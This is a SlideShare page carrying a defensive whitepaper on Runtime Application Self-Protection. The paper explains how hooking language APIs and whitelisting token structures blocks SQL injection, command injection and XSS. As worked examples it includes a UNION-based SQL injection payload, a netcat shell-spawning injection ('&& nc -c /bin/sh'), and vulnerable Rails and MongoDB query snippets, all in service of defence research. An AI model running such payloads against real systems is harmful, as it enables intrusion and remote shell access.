Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Injecting Security into Web apps at Runtime Whitepaper


Published on

This paper discusses the research outcomes on implementing a runtime application patching algorithm on an insecurely-coded application to protect it against code injection vulnerabilities and other logical issues related to web applications, and will introduce the next generation web application defending technology dubbed as Runtime Application Self-Protection (RASP) that defends against web attacks by working inside your web application. RASP relies on runtime patching to inject security into web apps implicitly without introducing additional code changes. The talk concludes with the challenges in this new technology and gives you an insight on future of runtime protection.

Published in: Technology
  • Be the first to comment

Injecting Security into Web apps at Runtime Whitepaper

  1. 1. Injecting Security into Web Applications with Runtime patching and Context learning Ajin Abraham, IMMUNIO inc. Mike Milner, IMMUNIO inc. Steve Williams, IMMUNIO inc. Oliver Lavery, IMMUNIO inc. Abstract Web Application Security is not hard, but it is easy to get wrong as writing secure code is not as simple as preaching. To prevent unforeseen incidents from happening, organisations tend to rely on Web Application Firewalls or WAFs. Software and hardware WAFs have existed for a long time in the security industry. They work from outside or around the web application and act based on the HTTP request coming to the web server, deciding whether to allow or block traffic based on traditional signature based checks. As such WAFs are never aware of application state. The strength of these traditional firewalls depends on manual or predefined rules/signatures. Additionally, they can be bypassed if a payload is not present in their signature list. In the case of a zero day vulnerability, a traditional WAF mostly will not be able to prevent an attack as they do not know the signature of the exploit payload. The weakness of WAFs are clearly evident when it comes to modern application security challenges including:​ ​Credential Stuffing; Session Hijacking; etc. These attacks cannot be detected as WAFs do not know the application’s characteristics and behaviour. This research gives an insight on Runtime Application Self Defence, a method to protect your web applications by hooking critical language/framework APIs, performing application learning to dynamically generate rules and defend against attacks with significantly higher accuracy than WAF or related technologies. Introduction This paper discusses the research outcomes of implementing a proof-of-concept runtime application patching library on an insecurely coded application. We make it secure against code injection vulnerabilities and other logical issues related to web applications. We introduce the next generation web application defense technology, dubbed Runtime Application Self Protection (RASP) by Gartner. RASP works by understanding an application’s runtime behaviour in order to defend against web attacks. This is possible because some RASP operates from within the web application, and relies on Runtime Patching to inject security into web applications, without requiring additional code changes. The root cause of code injection vulnerabilities is that the language interpreter cannot distinguish between data and code. The proposed solution detects code context breakouts to identify and prevent code injections, with the help of runtime instrumentation at the framework or language API level. This research focuses mainly on detecting and preventing vulnerabilities including SQL Injection, XSS, Remote and Command Execution.
  2. 2. Challenges in Software Development Life Cycle In a mature organisation, the Software Development Life Cycle (SDLC) is handled by the Engineering and Security/QA teams. Writing secure code is not trivial and therefore you cannot reasonably expect developers to write secure code all of the time. Further, logic errors in code, lead to logic bugs which are difficult to catch just by reading the code. The SDLC process involves periodic code reviews, static analysis and penetration testing, depending on the complexity and release frequencies of the project. In theory this approach looks fine, but for an organisation with large complex projects, it is difficult to provide complete testing coverage with limited manpower in security teams. If this process was perfect, then we would not hear about breaches. To overcome such unforeseen incidents, enterprises rely on Web Application Firewalls (WAFs) to protect their assets. WAFs are signature based and therefore work very much like an Antivirus solution. They may require setting up a hardware device with configuration and maintenance requiring a technical expert. At any point, a WAF can be defeated if an attack payload bypasses the signature list, or if it does not match a signature. One such example is a typical zero day exploit for which a WAF does not yet have a signature. To protect from a new vulnerability, you need to update WAF rules regularly and this protection is available only after the WAF vendor provides you with a signature. However in the real world, things are slightly different. Due to high rates of false positives, most organisations that use a WAF only run them in monitoring mode and never turn on blocking/protection mode. These false positives occur because WAFs cannot understand your application’s behaviour and characteristics. A WAF can only act based on a pre-written generic rule set, which may not be applicable to your custom built application. In addition to a WAF, application security teams must use static and dynamic analysis tools to assess the security of their applications. To get better results, especially for dynamic analysis, all the functional flows of the application needs to be covered. During the testing phase, there is a chance of missing some functional flows due to application complexity or limitations, e.g. automated scanners that are unable to analyse all the flows in an application. Today an increasing number of enterprises follow agile development models that mean production builds are generated on a monthly or even weekly basis. This increases customer value at a faster pace, but equally increases the chance of introducing a security vulnerability in each release. Monkey Patching for Runtime Application Self Defence The term “monkey patch” refers to dynamic modifications of a class or module at runtime. Runtime hooking and patching or monkey patching “​is a way for a program to extend or modify supporting system software locally (affecting only the running instance of the program).​ ” -Wikipedia The RASP approach discussed in this research​ relies on the technique of monkey patching to hook into API functions exposed by a framework or language. The patched function detects context breakouts in real time, thus preventing vulnerabilities from being exploited, including by zero day attacks. We achieve superior accuracy compared to a traditional WAF design as we work within the application. We have access to the core components of the web application like request/response handling API, framework APIs that perform template interpolation to render an HTML template, SQL drivers that execute SQL queries on a backend database, and Command Execution APIs of the language (e.g. ​os.system() ​, ​subprocess. Popen()​ in Python) that can execute shell commands. RASP can learn an application’s behaviour and functional flows and generate dynamic rules which act as a whitelist. Once the learning phase is done, RASP monitors for code context breakouts to
  3. 3. detect vulnerabilities and prevent exploitation, but at the same time allows a web application’s legitimate functionality. Security Features and Limitations of Modern Web Frameworks The Web has evolved and we have a wide range of Web Frameworks that simplify the process of Web application development. Many of these frameworks recognize the need for Application Security by introducing basic security additions like automating HTML escaping on templates, built-in anti-CSRF token support, and providing a high level abstraction of database models like ORMs to reduce SQL injection vulnerabilities. If we take a deeper look into these features, it becomes obvious that frameworks do not offer complete protection, but only a thin layer of defence. If a developer makes a minor mistake, a security vulnerability can still easily occur. Some of the issues with built-in security features provided by the web frameworks are: 1. The framework only performs basic HTML escaping on templates by default, generally by looking for the greater-than and less-than symbols used in HTML. XSS has the concept of context where each context needs its own specific escaping. If you apply one context specific escaping to a different context, which can still make the application vulnerable to XSS. For instance an HTML attribute value interpolation can be exploited without using the greater-than or less-than characters. Another problem that can occur is developers intentionally turning off template escaping to write some raw HTML, which in turn may contain untrusted user input. 2. In the real world, even though ORMs provide some APIs to query databases, there remains a risk of SQL injection. At some point the ORM has to generate plain SQL queries to perform database operations; the ORM query generator may construct SQL queries with untrusted user input without proper escaping. For example, consider the Rails ORM query syntax that can cause SQLi with untrusted input: User.exists? ["name = '#{params[:user]}'"] Similar code that can cause Mongo DB injection in NodeJS: db.myCollection.find( { $where: “user_input" } ); So it is clear that security features provided by web frameworks have limitations. They are all developed for the generic web application and cannot cover every scenario. This limitation and the fact developers make mistakes opens the door for vulnerabilities in modern web applications. Securing Web Applications with a RASP module We propose that a well designed RASP can solve a wide range of AppSec problems, including code injection, with a negligible false positive rate. One main advantage of a RASP compared to other security solutions is that RASP does not require changes to an application's source code, nor does it require complex manual configuration. Simply include the RASP module in your project and it will monkey patch critical APIs to generate whitelist rules and start defending against attacks. RASP technologies can continually learn, are easy to maintain and are even effective against zero day vulnerabilities.
  4. 4. Detection and prevention of Code Injection Vulnerabilities Code injection vulnerabilities occur because an interpreter/code parser does not distinguish between code and data that has been supplied by a threat agent. This is the fundamental reason why injection vulnerabilities occur. We try to detect SQL injection vulnerabilities by detecting context changes that indicate payloads have ‘broken out’ of the context data and have injected new code instructions. The same method described below can be applied to other injection vulnerabilities as well. The process involved in defending code injection vulnerabilities is as follows: 1. Monkey patching language API 2. Lexical analysis to generate dynamic rules 3. Application learning or Code context learning 4. Detect attacks on Context breakouts Monkey patching language APIs We hook into critical language APIs where code injection occurs and extract the arguments to the function. Some APIs we hook are database calls responsible for executing SQL queries, language APIs responsible for executing shell commands, template rendering APIs that render data to templates etc. During the initial phase of application learning, we hook and collect the arguments passed to the critical APIs and perform lexical analysis on these for rule generation. Lexical analysis to generate dynamic rules We perform lexical analysis on SQL queries and command arguments to shell execution APIs to generate a whitelist of allowable command structures. This process involves parsing the query/code argument and tokenizing them with a lexer. The tokens generated by the lexer are then used for dynamic rule generation. For typical lexical analysis, if the lexer finds an invalid token it will throw an error. However our custom lexer implementation will categorise and catch those tokens that are not in the parser’s grammar. A typical lexer will convert: int value = 100;//value is 100 Into: int​ (​KEYWORD​), ​value​ (​IDENTIFIER​), ​=​ (​OPERATOR​), ​100​ (​CONSTANT​) ​;​ (​SYMBOL​) Our lexer will output this as: int​ (​KEYWORD​), (​WHITESPACE​), ​value​ (​IDENTIFIER​), (​WHITESPACE​), ​=​ (​OPERATOR​), (​WHITESPACE​), ​100​ (​CONSTANT​), ​;​ (​SYMBOL​), ​//value is 100 ​ (​SINGLE LINE COMMENT​) And the rule generated will be as follows: KEYWORD WHITESPACE IDENTIFIER WHITESPACE OPERATOR WHITESPACE CONSTANT SYMBOL SINGLE LINE COMMENT Application learning or Code context learning
  5. 5. Application learning is very crucial for effective runtime self defence. During the learning phase, we tokenize the queries/function arguments to generate rules for all flows through an application. When we deploy a RASP, during an initial period, the RASP learns the application flows to generate rules which are later used as a whitelist. We need to navigate through all the regular flows of the application so that the RASP can learn the application effectively. RASP can learn new code contexts while defending previously learnt contexts, such that even when you have a rapidly changing production environment, our RASP can detect new changes and perform learning only for the newly introduced or modified code. Once application learning is completed for any given application flow, our RASP will start defending against attacks. Detect attacks on context breakouts Once the RASP learns the web application and the rule generation threshold is met, it can automatically move into defence mode. Now every time a critical API is called, our RASP hooks the arguments to the API call, tokenizes them using a lexer to generate a rule, and then matches that rule against the previously generated whitelist. If the structure of the tokenized code is not in the whitelist, the RASP blocks the API call and prevents the attack. Preventing code injection vulnerabilities This research uses the concept of application learning and rule generation to detect vulnerabilities like SQL Injection and Remote Command Execution. The same logic can be applied to other code injection vulnerabilities as this conceptual approach is very generic. The research focuses on the following: 1. SQL Injection Prevention 2. Remote Command Injection Prevention 3. Context specific escaping to prevent Reflected and Stored Cross Site Scripting SQL injection prevention The first step is to hook the SQL execution function and generate SQL context rules. We monkey patch the database driver functions responsible for SQL query execution. For this research, we use Python’s sqlite3 driver. During the learning phase, we extract the SQL queries executed by the application and perform lexical analysis on them to form the tokens for generating dynamic rules corresponding to the SQL query. For example consider this SQL query syntax, SELECT * from users where id=<user input> And let’s say the user input is 1 so the query will be SELECT * from users where id=1 Lexical analysis on the above query will generate the following tokens: QUERY TOKEN SELECT KEYWORD
  6. 6. WHITESPACE * OPERATOR WHITESPACE from KEYWORD WHITESPACE users STRING WHITESPACE where KEYWORD WHITESPACE id STRING = OPERATOR 1 NUMBER The rule corresponding to ​SELECT * from users where id=1 ​will be ​KEYWORD WHITESPACE OPERATOR WHITESPACE KEYWORD WHITESPACE STRING WHITESPACE KEYWORD WHITESPACE STRING OPERATOR NUMBER Here the structure will remain the same even when the ​id​ changes, for example ​SELECT * from users where id=20 ​ will also generate the same rule structure. We generate the tokenized rules for all the SQL queries executed through the hooked SQL driver during the learning phase. After the learning phase is over, let’s say an SQL injection happens. For example consider the SQL syntax: SELECT * from users where id=<user_input> The attacker provide the payload ​1 union select 1,2,3,4 - -​ to trigger an SQL injection. The constructed SQL query will look like: SELECT * from users where id= ​1 union select 1,2,3,4 -- which is translated into the following structure: KEYWORD WHITESPACE OPERATOR WHITESPACE KEYWORD WHITESPACE STRING WHITESPACE KEYWORD WHITESPACE STRING OPERATOR NUMBER ​WHITESPACE KEYWORD WHITESPACE KEYWORD WHITESPACE NUMBER SEPARATOR NUMBER SEPARATOR NUMBER SEPARATOR NUMBER WHITESPACE OPERATOR OPERATOR Now when the RASP is in protection mode it will compare the above structure with the previously learned corresponding rule for this context which is: KEYWORD WHITESPACE OPERATOR WHITESPACE KEYWORD WHITESPACE STRING WHITESPACE KEYWORD WHITESPACE STRING OPERATOR NUMBER The code structure generated is a violation of the whitelist and the payload breaks the data context
  7. 7. and tries to execute SQL code. At this stage, we prevent the SQL driver from executing this query to prevent SQL injection. As we hook into the SQL execute function in the code, we are able to identify the exact location of the vulnerable code, including the line number and stack trace. Remote Command Injection prevention Conceptually preventing Command Injection is similar to SQLi prevention; they are both instances of injection vulnerabilities. Here we monkey patch command execution functions provided by Python e.g. ​os.system() ​, ​os.popen()​, ​subprocess.Popen() ​ etc. We extract the arguments to the function that are executed in the shell and tokenize them using a custom shell command lexer. Our simple lexer can tokenize typical command line tool arguments and is capable of determining executable names, arguments, string, IP address, number, operator, splitter, whitespace etc. with the help of parser. For example consider a shell command that takes user input: ping -c 3 <user input> When the user input is the command will look like: ping -c 3 127.0.01 After lexical analysis, the above command will be tokenized as: COMMAND TOKEN ping EXECUTABLE WHITESPACE -c ARGUMENT_DASH WHITESPACE 3 NUMBER WHITESPACE IP_OR_DOMAIN Here the rule corresponding to ​ping -c 3 127.0.01 ​ will be: EXECUTABLE WHITESPACE ARGUMENT_DASH WHITESPACE NUMBER WHITESPACE IP_OR_DOMAIN During the learning phase, like the previous algorithm, we tokenize and learn all the shell commands that are passed into different command execution API calls in the language. Once the learning is complete these rules can be enforced. For example, consider a shell command that takes user input: ping -c 3 <user input> If the attacker provides the payload ​​ ​&& nc -c /bin/sh 1337 ​to break the context and execute arbitrary code, the shell command is constructed as:
  8. 8. ping -c 3 ​ && nc -c /bin/sh 1337 After lexical analysis the following structure is generated EXECUTABLE WHITESPACE ARGUMENT_DASH WHITESPACE NUMBER WHITESPACE IP_OR_DOMAIN ​WHITESPACE SPLITTER WHITESPACE EXECUTABLE WHITESPACE ARGUMENT_DASH WHITESPACE UNIX_PATH WHITESPACE IP_OR_DOMAIN WHITESPACE NUMBER This is a violation of the learnt rule for the context, thus EXECUTABLE WHITESPACE ARGUMENT_DASH WHITESPACE NUMBER WHITESPACE IP_OR_DOMAIN When the rules doesn’t match, our RASP identifies an arbitrary command injection and prevents it from executing. Context specific escaping to prevent Reflected and Stored Cross Site Scripting Cross Site Scripting is a web vulnerability that can be slightly complicated at times with reflection contexts, parser precedence, browser behaviour, etc. making it difficult to solve using the approach we used for SQLi and RCE for various reasons, including the performance overhead on lexing large chunk of HTML and browsers are very generous about HTML syntax. Often browsers auto correct misaligned tags, attributes etc. XSS is all about reflected contexts. If you can detect these contexts and prevent context breakouts then you can effectively prevent XSS. Modern web frameworks use templates and template rendering functions to generate a HTML response with dynamic data substitutions, where user input can be inserted and cause a potential XSS attack if data is not properly escaped. A sample template will look like: <html> <head> <title>Welcome {{ title }} </title> </head> <body> Hello {{ txt }} </body> </html> Here ​{{ title }} ​ and ​{{ txt }}​ are the template expressions that gets substituted with data at runtime to generate the final HTML. The data can come from user input, or it can be generated at runtime or from a database field. In order to prevent XSS, we hook the template rendering function of Tornado web framework, access the template and determine the contexts where data is substituted dynamically for HTML generation. The process involves hooking into the templating engine’s render() function and extract the template HTML, template interpolation points and the data to be interpolated into template. The template HTML is then normalised to produce HTML that is the closest representation of how a browser will interpret them. We then construct an HTML syntax tree using an HTML parser. After this step, the HTML syntax tree is walked and each node is parsed to
  9. 9. determine template interpolation contexts. Additionally all JavaScript nodes are parsed separately by a JavaScript parser. Some contexts that we identify in our proof-of-concept are: CONTEXT EXAMPLE html_body <p>{user_input}</p> html_comment <!— footer {user_input} —> attribute_value <p alt=“{user_input}”>foo</p> attribute_name <body {user_input}=“foo”> iframe_src <iframe src=“{user_input}”> anchor_href <a href=“ {user_input}”>foo</a> Reflected and Stored XSS context learning happens on the first request, i.e. the first time a template interpolation happens. When the template rendering function is called, we hook it and identify the context of each template interpolation. For subsequent requests to the same template rendering function, the data to the template rendering function will be escaped as per the context before template interpolation. This is possible because during the learning request we understood the template rendering contexts and now we can apply context specific escaping instead of a generic HTML escape that the framework provides. A generic WAF will either provide HTML escape globally or will block the request if it detects a potential cross site scripting payload in the request. This can cause a lot of false positives. However in our approach instead of blocking the request, we provide context specific escaping to prevent context breakouts that cause XSS. Conclusion We implemented a runtime application self defence algorithm on an insecure Python web application to inject security at runtime. We successfully detected and prevented SQLi, RCE, and XSS attacks without additional code changes.. The techniques or methods discussed in this research are not an exhaustive list of defences that a RASP can provide, but rather cover some significant defences that we can implement with this technology. We have also discussed how this technology can outperform traditional web application firewalls that require complex hardware and tuning. RASP enables us to solve the fundamental code vs data problem of application security by moving from blacklist/signature based checks to a dynamically generated whitelist approach. References l